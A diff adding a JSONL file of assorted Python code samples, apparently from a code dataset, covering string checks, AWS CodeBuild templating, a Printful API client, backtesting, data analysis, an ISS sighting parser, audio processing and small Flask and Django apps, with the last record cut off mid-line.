diff --git "a/2260.jsonl" "b/2260.jsonl" new file mode 100644--- /dev/null +++ "b/2260.jsonl" @@ -0,0 +1,582 @@ +{"seq_id":"274194981","text":"\"\"\"\nIn the first line, print True if S has any alphanumeric characters. Otherwise, print False.\nIn the second line, print True if S has any alphabetical characters. Otherwise, print False.\nIn the third line, print True if S has any digits. Otherwise, print False.\nIn the fourth line, print True if S has any lowercase characters. Otherwise, print False.\nIn the fifth line, print True if S has any uppercase characters. Otherwise, print False.\nInput : qA2\nOutput :\nTrue\nTrue\nTrue\nTrue\nTrue\n\"\"\"\nif __name__ == '__main__':\n s = input()\n ctrl1 = False\n ctrl2 = False\n ctrl3 = False\n ctrl4 = False\n ctrl5 = False\n for i in s:\n ctrl1 = ctrl1 or (lambda x: x.isalnum())(i)\n ctrl2 = ctrl2 or (lambda x: x.isalpha())(i)\n ctrl3 = ctrl3 or (lambda x: x.isdigit())(i)\n ctrl4 = ctrl4 or (lambda x: x.islower())(i)\n ctrl5 = ctrl5 or (lambda x: x.isupper())(i)\n print(ctrl1, ctrl2, ctrl3, ctrl4, ctrl5, sep=\"\\n\")\n","sub_path":"string-validators.py","file_name":"string-validators.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"488358168","text":"import copy\nimport yaml\nfrom sceptre.cli.helpers import CfnYamlLoader\n\n\ndef _add_cron_triggers(template,expressions):\n if len(expressions) == 0:\n return\n \n resources = template[\"Resources\"]\n codebuild_tags=copy.deepcopy(resources['CodeBuildProject']['Properties']['Tags'])\n return\n\n\n\ndef sceptre_handler(sceptre_user_data) -> str :\n with open(\"templates/codebuild.yaml\") as f_in:\n template_obj= yaml.load(f_in,Loader=CfnYamlLoader)\n\n adv_env_vars = sceptre_user_data.get('AdvancedEnvironmentVariables')\n\n if adv_env_vars:\n new_vars = list()\n\n #ADD NPM authorization\n #This is extra variable not used in CRM team\n #need to grep and check which service is using and what is the use case\n if adv_env_vars.get(\"NPM\",False):\n print(\"\")\n \n #Add artifactory path\n #This is extra variable not used in CRM team\n #need to grep and check which service is using and what is the use case\n if adv_env_vars.get(\"Artifactory\",False):\n print(\"\")\n\n custom_vars=adv_env_vars.get(\"CustomVariables\")\n if custom_vars:\n for name,value in custom_vars.items():\n #need to grep and check which service is using and what is the use case \n if isinstance(value,dict) and \"Value\" in value:\n v_value=value.get(\"Value\")\n v_type=value.get(\"Type\")\n else:\n v_value= value\n v_type = \"PLAINTEXT\"\n\n new_vars.append({\n \"Name\": name,\n \"Type\": v_type,\n \"Value\": v_value \n }\n )\n template_obj[\"Resources\"][\"CodeBuildProject\"][\"Properties\"][\"Environment\"][\"EnvironmentVariables\"] = new_vars\n\n schedules = sceptre_user_data.get(\"ScheduleRuns\") \n if schedules is not None:\n if isinstance(schedules,str):\n schedules=[schedules]\n schedules=sorted(schedules)\n _add_cron_triggers(template_obj,schedules)\n\n\n #Create and Enable Codestar Notification Rule\n CodeStarNotificationRule = sceptre_user_data.get(\"NotificationRule\")\n if CodeStarNotificationRule is not None:\n _add_notification_rule(template_obj,CodeStarNotificationRule)\n\n#what exactly we are using this function\ndef _get_sceptre_connection_manager():\n import inspect\n\n for frame_info in inspect.stack():\n frame=frame_info.frame\n variables=frame.f_locals\n if variables is None or \"self\" not in variables:\n continue\n self_ref = variables['self']\n if not hasattr(self_ref,\"connection_manager\"):\n continue\n connection_manager = getattr(self_ref,\"connection_manager\")\n # isinstance might not work here\n object_found = type(connection_manager).__module__.endswith('sceptre.connection_manager') and type(\n connection_manager).__name__=='ConnectionManager'\n if not object_found:\n continue\n return connection_manager\n \n raise RuntimeError(\"Unable to find sceptre connection manager in the stack\")\n\n#Method to add CodeStar Notification to codebuild Template\ndef _add_notification_rule(template,CodeStarNotificationRule):\n _notification_rule_property=CodeStarNotificationRule\n if _notification_rule_property.get(\"TopicArn\") is None:\n return\n else:\n _topicArn = str(_notification_rule_property.get(\"TopicArn\"))\n \n if _notification_rule_property.get(\"EventTypeIds\") is not None :\n _eventTypeIds=_notification_rule_property.get(\"EventTypeIds\")\n else:\n _eventTypeIds=[\"codebuild-project-build-state-failed\",\"codebuild-project-build-state-succeeded\"]\n \n resources=template[\"Resource\"]\n codebuild_tags=copy.deepcopy(resources['CodeBuildProject']['Properties']['Tags'])\n\n #what exactly we are using this function for getting stack name\n connection_manager=_get_sceptre_connection_manager()\n stack_name=str(connection_manager.stack_name)\n\n notification_rule_postfix = \"-NotificationRule\"\n\n safety_margin = 4\n number_of_char_in_asset_id = 8\n\n char_available=(64-len(notification_rule_postfix)-number_of_char_in_asset_id-safety_margin)\n\n resourses[\"CodeStarNotificationRule\"]= {\n \"Type\": \"AWS::CodeStarNotifications::NotificationRule\",\n \"Properties\": {\n \"Name\": {\n \"Fn::Sub\": [stack_name[-char_available:]+notification_rule_postfix,{}]\n },\n \"DetailType\": \"FULL\",\n \"Resource\": {\n \"Fn::GetAtt\": [\n \"CodeBuildProject\",\n \"Arn\"\n ]\n },\n \"EventTypeIds\": _eventTypeIds,\n \"Targets\": [\n {\n \"TargetType\": \"SNS\",\n \"TargetAddress\": _topicArn\n }\n ],\n \"Tags\": codebuild_tags\n }\n }\n \n\n","sub_path":"sceptre-project/cloud-nokku-project/templates/resources/codebuild.py","file_name":"codebuild.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"435352429","text":"\"\"\"Printful REST API client/wrapper.\"\"\"\n\n\nfrom .exceptions import PrintfulException, PrintfulApiException\n\nfrom tweetmerch_website.core.secrets import Secrets\nimport requests\nimport json\n\n\nclass PrintfulClient:\n \"\"\"Printful REST API wrapper.\"\"\"\n\n\n __API_ENDPOINT = 'https://api.printful.com/'\n __USER_AGENT = 'Printful API Python Client for TweetMerch'\n\n __api_key = None\n\n\n def __init__(self, api_key=Secrets.get('PRINTFUL_API_KEY')):\n \"\"\"\n Initializes the Printful REST API client/wrapper with an `api_key`.\n\n Keyword Arguments:\n - `api_key`: Printful REST API authorization API key, provided via your\n Printful store dashboard (optional, defaults to `PRINTFUL_API_KEY`\n stored in secrets).\n \"\"\"\n\n\n self.__api_key = api_key\n\n\n def __request(self, method, path, data=None, params=None,\n verify_in_response={}):\n \"\"\"\n Performs authorized request to `path` on top of `__API_ENDPOINT` with\n any provided data and/or params and returns its response.\n\n Positional Arguments:\n - `method`: HTTP request method (i.e. `'GET'`, `'POST'`, `'PUT'`).\n - `path`: Printful REST API endpoint path without a beginning `/`.\n\n Keyword Arguments:\n - `data`: `dict` of data to send with request, typically for\n `'POST'` or `'PUT'` `method`s. (optional, defaults to `None`)\n - `params`: `dict` of URL parameters to append to the endpoint url.\n (optional, defaults to `None`)\n - `verify_in_response`: `set` of tuples in the form\n `(, )` to verify each key exists in the\n `response` dict and each key's value is of the expected type. If one of\n them is not in `response` or one's value is not of the expected type,\n `PrintfulException` will be raised. (optional, defaults to `{}` - an\n iterable `None`)\n \"\"\"\n\n\n endpoint_url = f'{self.__API_ENDPOINT}{path}'\n response = getattr(requests, method.lower())(\n endpoint_url,\n auth=requests.auth.HTTPBasicAuth(self.__api_key, ''),\n data=json.dumps(data) if data else None,\n params=params,\n headers={\n 'User-Agent': self.__USER_AGENT,\n 'Content-Type': 'application.json',\n },\n )\n response_data = json.loads(response.text)\n\n # Check response for errors.\n if all(key in response_data for key in ['code', 'result']):\n # Printful REST API responded with its typical components, `code`\n # & `result`. If an error occured, there will be an `error` key\n # present.\n if 'error' in response_data:\n # Printful REST API responded with an error.\n msg = (f'{response_data[\"code\"]}, '\n f'{response_data[\"error\"][\"reason\"]}: '\n f'{response_data[\"error\"][\"message\"]}')\n raise PrintfulApiException(msg)\n else:\n # Printful REST API did not respond with its typical components,\n # `code` & `result`.\n msg = (f'Invalid response from Printful REST endpoint '\n f'`{endpoint_url}`. Response data: {response_data}.')\n raise PrintfulApiException(msg)\n\n # Printful REST API responded without errors.\n result = response_data['result']\n\n # Verify `verify_in_response` keys exist in `result` dict and each\n # key's value is of the expected type.\n for key_to_verify, type_to_verify in verify_in_response:\n if key_to_verify not in result:\n msg = (f'Printful REST API `response` did not have '\n f'`verify_in_response` key `{key_to_verify}`.')\n raise PrintfulException(msg)\n elif not isinstance(result[key_to_verify], type_to_verify):\n msg = (f'Printful REST API `response`\\'s '\n f'`verify_in_response` key `{key_to_verify}`\\'s '\n f'expected type was `{type_to_verify}` but '\n f'`{key_to_verify}`\\'s type was '\n f'`{type(result[key_to_verify])}`.')\n raise PrintfulException(msg)\n\n return result\n\n\n def __get(self, *args, **kwargs):\n \"\"\"\n Performs GET request and returns response.\n\n View `self.__request` method for available positional and keyword\n arguments.\n \"\"\"\n\n return self.__request('GET', *args, **kwargs)\n\n\n def __post(self, *args, **kwargs):\n \"\"\"\n Performs POST request and returns response.\n\n View `self.__request` method for available positional and keyword\n arguments.\n \"\"\"\n\n return self.__request('POST', *args, **kwargs)\n\n\n def get_information_about_variant(self, variant_id):\n \"\"\"\n Returns information about a specific Variant and its Product.\n\n Printful Docs: https://www.printful.com/docs/products#actionVariant\n\n Positional Arguments:\n - `variant_id`: Printful Variant id.\n \"\"\"\n\n path = f'products/variant/{variant_id}'\n verify_in_response = {('variant', dict), ('product', dict)}\n\n return self.__get(path, verify_in_response=verify_in_response)\n\n\n def get_products_variant_list(self, product_id):\n \"\"\"\n Returns information about a specific Product and a list of Variants of\n the Product.\n\n Printful Docs: https://www.printful.com/docs/products#actionGet\n\n Positional Arguments:\n - `product_id`: Printful Product id.\n \"\"\"\n\n path = f'products/{product_id}'\n verify_in_response = {\n ('variants', list),\n ('product', dict),\n }\n\n return self.__get(path, verify_in_response=verify_in_response)\n\n\n def retrieve_product_variant_printfiles(self, product_id):\n \"\"\"\n Returns list of printfiles available for product variants.\n\n Printful Docs: https://www.printful.com/docs/generator#actionPrintfiles\n\n Positional Arguments:\n - `product_id`: Printful Product id.\n \"\"\"\n\n path = f'mockup-generator/printfiles/{product_id}'\n verify_in_response = {\n ('product_id', int),\n ('available_placements', dict),\n ('product_id', int),\n ('available_placements', dict),\n ('printfiles', list),\n ('variant_printfiles', list),\n }\n\n return self.__get(path, verify_in_response=verify_in_response)\n","sub_path":"printful/core/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457611584","text":"# Copyright 2016-present CERN – European Organization for Nuclear Research\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom time import time\nfrom typing import List\n\n\nfrom demo_scripts.backtester.moving_average_alpha_model import MovingAverageAlphaModel\nfrom demo_scripts.demo_configuration.demo_ioc import container\nfrom qf_lib.analysis.trade_analysis.trades_generator import TradesGenerator\nfrom qf_lib.backtesting.alpha_model.alpha_model import AlphaModel\nfrom qf_lib.backtesting.strategies.signal_generators import OnBeforeMarketOpenSignalGeneration\nfrom qf_lib.backtesting.strategies.alpha_model_strategy import AlphaModelStrategy\nfrom qf_lib.backtesting.fast_alpha_model_tester.initial_risk_stats import InitialRiskStatsFactory\nfrom qf_lib.backtesting.fast_alpha_model_tester.scenarios_generator import ScenariosGenerator\nfrom qf_lib.backtesting.monitoring.backtest_monitor import BacktestMonitorSettings\nfrom qf_lib.backtesting.position_sizer.initial_risk_position_sizer import InitialRiskPositionSizer\nfrom qf_lib.backtesting.trading_session.backtest_trading_session import BacktestTradingSession\nfrom qf_lib.backtesting.trading_session.backtest_trading_session_builder import BacktestTradingSessionBuilder\nfrom qf_lib.common.enums.frequency import Frequency\nfrom qf_lib.common.tickers.tickers import BloombergTicker\nfrom qf_lib.common.utils.dateutils.string_to_date import str_to_date\n\n\ndef _create_trading_session(init_risk: float):\n start_date = str_to_date('2013-01-01')\n end_date = str_to_date('2016-12-31')\n\n session_builder = container.resolve(BacktestTradingSessionBuilder) # type: BacktestTradingSessionBuilder\n session_builder.set_position_sizer(InitialRiskPositionSizer, initial_risk=init_risk)\n session_builder.set_monitor_settings(BacktestMonitorSettings.no_stats())\n session_builder.set_backtest_name(\"Initial Risk Testing - {}\".format(init_risk))\n session_builder.set_frequency(Frequency.DAILY)\n ts = session_builder.build(start_date, end_date)\n return ts\n\n\ndef get_trade_rets_values(ts: BacktestTradingSession, model: AlphaModel) -> List[float]:\n model_tickers_dict = {model: [BloombergTicker('SVXY US Equity')]}\n\n strategy = AlphaModelStrategy(ts, model_tickers_dict, use_stop_losses=True)\n OnBeforeMarketOpenSignalGeneration(strategy)\n ts.use_data_preloading([BloombergTicker('SVXY US Equity')])\n ts.start_trading()\n\n trades_generator = TradesGenerator()\n trades = trades_generator.create_trades_from_backtest_positions(ts.portfolio.closed_positions())\n returns_of_trades = [t.pnl for t in trades]\n return returns_of_trades\n\n\ndef main():\n stats_factory = InitialRiskStatsFactory(max_accepted_dd=0.1, target_return=0.02)\n initial_risks_list = [0.001, 0.005, 0.01, 0.02, 0.03, 0.05, 0.1]\n\n scenarios_generator = ScenariosGenerator()\n scenarios_df_list = []\n\n nr_of_param_sets = len(initial_risks_list)\n test_start_time = time()\n print(\"{} parameters sets to be tested\".format(nr_of_param_sets))\n\n param_set_ctr = 1\n for init_risk in initial_risks_list:\n start_time = time()\n ts = _create_trading_session(init_risk)\n alpha_model = MovingAverageAlphaModel(5, 20, 1.25, ts.data_provider) # Change to a different alpha model to test it\n trade_rets_values = get_trade_rets_values(ts, alpha_model)\n scenarios_df = scenarios_generator.make_scenarios(\n trade_rets_values, scenarios_length=100, num_of_scenarios=10000\n )\n\n end_time = time()\n print(\"{} / {} initial risk parameters tested\".format(param_set_ctr, nr_of_param_sets))\n print(\"iteration time = {:5.2f} minutes\".format((end_time - start_time) / 60))\n param_set_ctr += 1\n\n scenarios_df_list.append(scenarios_df)\n\n print(\"\\nGenerating stats...\")\n start_time = time()\n\n stats = stats_factory.make_stats(initial_risks_list, scenarios_df_list)\n print(stats)\n\n end_time = time()\n print(\"iteration time = {:5.2f} minutes\".format((end_time - start_time) / 60))\n\n test_end_time = time()\n print(\"test duration time = {:5.2f} minutes\".format((test_end_time - test_start_time) / 60))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demo_scripts/backtester/compare_different_initial_risks.py","file_name":"compare_different_initial_risks.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"217814531","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nmaindirectory = \"G:/Sree LightSpot tests/groups/\"\ngroup = str(sys.argv[1])\ndirectory = maindirectory + group + \"/\"\n\ndef CreateCohort(location):\n\tos.chdir(location)\n\tfiles = os.listdir(location)\n\tdataset = None\n\tfor i in files:\n\t\tif dataset is not None:\n\t\t\ttemp = pd.read_csv(i)\n\t\t\ttemp = temp[(temp[\"Minutes\"] > 60) & (temp[\"Minutes\"] < 121)]\n\t\t\tdataset = pd.concat([dataset, temp[\"Shelter Duration\"]], axis=1)\n\t\t\tdel temp\n\t\tif dataset is None:\n\t\t\tdataset = pd.read_csv(i)\n\t\t\tdataset = dataset[(dataset[\"Minutes\"] > 60) & (dataset[\"Minutes\"] < 121)]\n\t\t\tdataset = dataset[\"Shelter Duration\"]\n\treturn dataset\t\n\n\ndef Shelter(cohort):\n\tMinutes = np.array(range(1, 61)).reshape(-1,1)\n\tShelter = np.zeros(60).reshape(-1,1)\n\tdata = np.concatenate([Minutes, Shelter], axis=1)\n\tinterval = 1\n\tfor j in range(0, 60):\n\t\tdata[j, 1] = cohort[\"Shelter Duration\"][cohort[\"Minutes\"] == interval].mean()\n\t\tinterval = interval + 1\n\tdata1 = pd.DataFrame(data)\n\tdata1.columns = [\"Minutes\", \"Shelter Duration\"]\n\treturn data1\n\t\ncohortdata = CreateCohort(directory)\ncohortdata.to_csv(directory + group + \"cohortdata.csv\")","sub_path":"darkshelter.py","file_name":"darkshelter.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208819549","text":"# Use simple find and replace to convert the class labels to 1, 2, and 3 in the dataset. \n# iris copy.data\n\n# %% Read the data and report mean and standard deviation for each column in the features (4 features)\nimport numpy as np\nimport pandas as pd\nimport random\n\niris_data = pd.read_csv(\"iris copy.data\", names=[\"x1\" , \"x2\" , \"x3\" , \"x4\" , \"y\"])\n\n# for col in iris_data.columns:\n# print(f\"Mean of {col} = {np.mean(iris_data[col])}\")\n# print(f\"StdDev of {col} = {np.std(iris_data[col])}\")\n\nprint(iris_data.mean())\nprint(iris_data.std())\n\n# %% Report the class distribution (i. e number of instances for each class)\niris_data.groupby([\"y\"]).size() \n\n# %% Show histogram for each feature. Note you need to use a single function/method that \n# outputs the histogram with a given filename. eg. feature1.png which is given as a parameter \n# to the function. A for loop should be used to call the function/method\nh = iris_data.hist()\n\n# %% Split data into a train and test test. Use 60 percent data in the training and test set \n# which is assigned i. randomly ii. assigned by first 60 percent as train and rest as test. \ntrain = iris_data.sample(frac=0.6, random_state=1)\ntest = iris_data.drop(train.index)\n\n# Use previous functions to report the mean and standard deviation of the train and test set \n# and class distribution and also the histograms for each feature. \nprint(train.mean())\nprint(train.std())\ntrain.hist()\n\nprint(test.mean())\nprint(test.std())\ntest.hist()\n\n# Create another subset of the train and test set where only 1 feature selected by the user \n# makes the dataset with the class. \n\n\n# %% Create a subset of the dataset where you consider only instances that feature class 1 or 2, \n# so that you treat this problem as a binary classification problem later, \n# i.e save it as binary_iristrain.txt and binary_iristest.txt. \n# Carry out the stats and visuals in Step 6 for this dataset. \niris_12 = iris_data.loc[(iris_data[\"y\"] == 1) | (iris_data[\"y\"] == 2)]\niris_12.to_csv('iris_12.data', index=False)\n\n\n# %% Can you normalise the input features between [0 and 1] ? \n# Write code that can do so and save normalised versions.\niris_norm_12 = iris_12.apply(lambda x: x/x.max(), axis = 0)\niris_norm_12.to_csv('iris_norm_12.data', index=False)\n# %%\n","sub_path":"Week1/iris/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69217415","text":"import codecs\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\nfrom xml.etree import ElementTree as etree\n\n# Replace the link within the iss_tracker_link variable below with the RSS link related to your locaation.\n# The specific RSS link can be found by going here: https://spotthestation.nasa.gov/sightings\n# Be sure to get the RSS link for your corresponding geography.\n\niss_tracker_link =\"https://spotthestation.nasa.gov/sightings/xml_files/United_States_California_Lakewood.xml\"\n\n# Raw xml dump from the link above.\nread_iss_link = urllib.request.urlopen(iss_tracker_link).read()\n\n# Parses xml from a string directly into an Element, which is the root element of the parsed tree.\niss_root = etree.fromstring(read_iss_link) \nitem = iss_root.findall('channel/item')\n\niss_desc = []\niss_date_tweet_dict = {}\n\n# Constructing the iss_desc[]\n\nfor entry in item:\n\tdesc = entry.findtext('description')\n\tiss_desc.append(desc)\n\nfor entry in iss_desc:\n\n\tentry = entry.replace(\"
\",\"\")\n\tentry = entry.replace(\"\\n\\t\\t\\t\\t\",\"\")\n\tentry = entry.replace(\"Date: \",\"\")\n\n\tloc_maxm = entry.find(\"Maximum\")\n\tloc_time = entry.find(\"Time\")\n\tloc_duration = entry.find(\"Duration\")\n\t\n\ttweet_date = str(datetime.datetime.strptime(entry[:loc_time], \"%A %b %d, %Y \").date())\n\t\n\t# Don't forget to change your @mentions and #hashtags below so to reflect you region and preferences.\n\n\tiss_date_tweet_dict[tweet_date] = \"The Int'l @Space_Station is passing over #LosAngeles on \" + entry[:loc_time] + \"at \"+ entry[loc_time+6:loc_duration] + \"for\" + entry[loc_duration+9:loc_maxm-1] + \". @GriffithObserv\"\n \n\n","sub_path":"iss_tracker_file_gen.py","file_name":"iss_tracker_file_gen.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481364090","text":"# example of configuration file\ntreeName= 'Events'\n\n\ntag = 'fit_v4.5_2018_VBFdipole'\ndirec = \"conf_fit_v4.5\"\n\n# used by mkShape to define output directory for root files\noutputDir = 'rootFile_'+tag \n\n# file with TTree aliases\naliasesFile = direc+'/aliases.py'\n\n# file with list of variables\nvariablesFile = direc+'/variables.py'\n\n# file with list of cuts\ncutsFile = direc +'/cuts.py' \n\n# file with list of samples\nsamplesFile = direc+'/samples.py' \n#samplesFile = direc+'/samples.py'\n\n#t file with list of samples\nplotFile = direc+'/plot.py' \n\n# luminosity to normalize to (in 1/fb)\nlumi = 59.74\n\n# used by mkPlot to define output directory for plots\n# different from \"outputDir\" to do things more tidy\n#outputDirPlots = 'plot_'+tag +\"_rescaled/detajpt_ext\"\noutputDirPlots = 'plot_'+tag \n\n# used by mkDatacards to define output directory for datacards\n#outputDirDatacard = 'datacards_'+tag \noutputDirDatacard = 'datacards_'+tag +\"_Dipole_v1\"\n\n# structure file for datacard\nstructureFile = direc+'/structure.py'\n\n\n# nuisances file for mkDatacards and for mkShape\nnuisancesFile = direc+'/nuisances.py'\n# nuisancesFile = direc + '/nuisances_datacard.py'\n\n\ncustomizeScript = direc + '/customize.py'","sub_path":"Configurations/VBSjjlnu/Full2018v7/configuration_fit_v4.5_2018_VBFdipole.py","file_name":"configuration_fit_v4.5_2018_VBFdipole.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499494047","text":"from scipy.io.wavfile import read,write\nfrom scipy.signal import stft,istft\nfrom scipy.fft import fft,ifft\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\nimport matplotlib.pyplot as plt\nframerate,audio=read('list1M_01.wav')\nplt.plot(audio)\nplt.show()\ntime_audio=len(audio)/framerate\nmin_time=0.02\nlen_seg=int(min_time*framerate)\nf,t,Zxx=stft(audio,nperseg=len_seg,noverlap=int(len_seg*0.8),window='hamming')\nf*=framerate\nt=np.linspace(0,time_audio,len(t))\n\nnw=np.zeros_like(Zxx)\nfor i in range(5,Zxx.shape[0]):\n\tnw[i]=Zxx[i-3]\nout=(istft(nw,nperseg=len_seg,noverlap=int(len_seg*0.8),window='hamming')[1]).astype('int16')\nplt.plot(out)\nplt.show()\nwrite('out.wav',framerate,out)\n\nimg=plt.pcolormesh(t,f[:50],2*np.log(np.abs(Zxx)+1e-6)[:50],vmin=-5,vmax=15,shading='auto')\nplt.title('Original')\nplt.colorbar(img,label='energy(db)')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.show()\n\nimg=plt.pcolormesh(t,f[:50],2*np.log(np.abs(nw)+1e-6)[:50],vmin=-5,vmax=15,shading='auto')\nplt.title('Pitch shifted')\nplt.colorbar(img,label='energy(db)')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.show()\n\n","sub_path":"homework1/submit/pitch_shift.py","file_name":"pitch_shift.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485597800","text":"from django.conf.urls import patterns, url\n\nfrom horsebook.booking.views import (\n create_booking,\n participate,\n student_abort_booking,\n show_booking,\n trainer_abort_booking_row,\n edit_booking\n)\n\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns(\n '',\n url(r'^edit/(?P[0-9]+)', view=edit_booking),\n url(r'^show_booking/(?P[0-9]+)', view=show_booking),\n url(r'^student_abort/(?P[0-9]+)', view=student_abort_booking),\n url(r'^trainer_abort/(?P[0-9]+)', view=trainer_abort_booking_row),\n url(r'^create$', view=create_booking),\n url(r'^participate$', view=participate),\n url(r'^confirm', TemplateView.as_view(template_name=\"booking/confirm.html\")),\n url(r'^confirm_participate', TemplateView.as_view(template_name=\"booking/confirm_participate.html\")),\n)\n","sub_path":"horsebook/booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220641961","text":"from matplotlib import pyplot as plt\r\n\r\nx = [1,2,3,4,5,6,7,8]\r\ny = [2,4,6,8,4,3,9,8]\r\n\r\nplt.scatter(x, y, label=\"scatter\", color=\"k\", s=100, marker=\"x\") # labe,warna,ukuran,marker\r\n\r\nplt.xlabel('x')\r\nplt.ylabel('y')\r\n\r\nplt.title('Interesting Graph')\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"python-matplotlib/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"43637381","text":"import time\nimport simpleaudio as sa\n\n# list with a rhythmic sequence in quarter notes\nnote_seq = [1.5, 1, 1, 0.5]\nbpm = 120\n\n# function to transform a rhythmic sequence into duration in time (sec.)\ndef to_time(src_seq, bpm):\n dst_seq = []\n dur_multiplyer = 60.0 / bpm\n\n # iterate through the source sequence, add duration values to destiation seq\n for note_dur in src_seq:\n dst_seq.append(note_dur * dur_multiplyer)\n\n return dst_seq\n\n# call the to_time function and store the restulting sequence\ntime_seq = to_time(note_seq, bpm)\n\nprint(\"Sequence with quarter note values:\", note_seq)\nprint(\"Sequence with duration values in seconds:\", time_seq)\n","sub_path":"csd2a/theorie/3_a_single_sample_drumploop.py","file_name":"3_a_single_sample_drumploop.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131631301","text":"from flask import Flask\n\napp = Flask(\"NOME\")\n\n@app.route(\"/hello\")\n@app.route(\"/hello/\")\n@app.route(\"/hello//\")\ndef echo_name(nome = None, sobrenome = None):\n\n if nome == None :\n nome = 'Visitante'\n if sobrenome == None :\n sobrenome = ' '\n\n return 'Ola internet: '+nome+' '+sobrenome, 200\n\napp.run(debug=True, use_reloader=True)\n","sub_path":"special-software-topics/2-bim/aula-09/flask/base/flask_app/app_proj2.py","file_name":"app_proj2.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"298819705","text":"import matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport numpy as np\nfrom tools import chargelib\n\nclass monthly:\n \n def __init__(self, month):\n df = pd.read_csv(month.write_path, index_col=0)\n\n df = df[ df['Category'] != 'payment']\n\n categories = list(chargelib.charges.keys()) \n amounts = dict()\n \n for c in categories:\n amounts[c] = np.round(np.sum(df[df['Category'] == c]['Amount']), decimals=2)\n\n self.amounts = amounts\n \n \n \n def plot(self):\n Type = list(self.amounts.keys())\n Amounts = list(self.amounts.values())\n \n df = pd.DataFrame({'types' : Type , 'amounts' : Amounts})\n gtz = df['amounts'] > 0\n df = df[gtz]\n df = df.sort_values('amounts', ascending=False)\n \n Type = list(df['types'].get_values())\n Amounts = list(df['amounts'].get_values())\n \n # Switch first and second \n _famt = Amounts[0]; _samt = Amounts[1]\n _ftype = Type[0]; _stype = Type[1]\n Amounts[0] = _samt; Amounts[1] = _famt\n Type[0] = _stype; Type[1] = _ftype\n \n for k in [-1 , -2, -3]:\n top = Amounts[-1*k]\n bottom = Amounts[k]\n Amounts[-1*k] = bottom\n Amounts[k] = top\n \n for k in [-1 , -2, -3]:\n top = Type[-1*k]\n bottom = Type[k]\n Type[-1*k] = bottom\n Type[k] = top\n \n \n def make_autopct(values):\n def my_autopct(pct):\n total = sum(values)\n val = pct*total/100.0\n return '${v:.2f} ({p:.2f}%) '.format(p=pct,v=val)\n return my_autopct\n\n fig1, ax1 = plt.subplots(figsize=(12, 12))\n ax1.pie(Amounts, labels=Type, autopct = make_autopct(Amounts),\n shadow=True, startangle=90)\n ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n \n plt.show()\n \n \nclass annual:\n \n def __init__(self, summary_dir):\n self.summary_dir = summary_dir\n self.summary = dict()\n files = os.listdir(summary_dir)\n self.months = ['january' , 'february' , 'march' , 'april', 'may' , 'june', 'july']\n self.Amounts = []\n for m in self.months:\n for f in files: \n if m in f:\n name = summary_dir + f\n df = pd.read_csv(name, index_col=0)\n \n categories = list(chargelib.charges.keys()) \n amounts = dict()\n \n df = df[ df['Category'] != 'payment']\n \n \n \n for c in categories:\n if c != 'payment':\n amounts[c] = np.round(np.sum(df[df['Category'] == c]['Amount']), decimals=2)\n self.Type = list(amounts.keys())\n self.Amounts.append(list(amounts.values()))\n \n# self.summary[m] = {'Category' : Type, 'Amounts' : Amounts}\n\n def plot(self):\n money_matrix = np.array(self.Amounts)\n plt.figure(figsize=(15,10))\n for count , p in enumerate(money_matrix.T):\n \n plt.plot(p, hold=True, linewidth=2, label = self.Type[count])\n plt.xticks(range(len(self.months)), self.months)\n plt.legend() \n \n \n \n","sub_path":"tools/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173739461","text":"import argparse\nimport os\n\nprint(\"In comparemodels.py: as a data scientist, this is where you should fill in code to compare two models.\")\n\nparser = 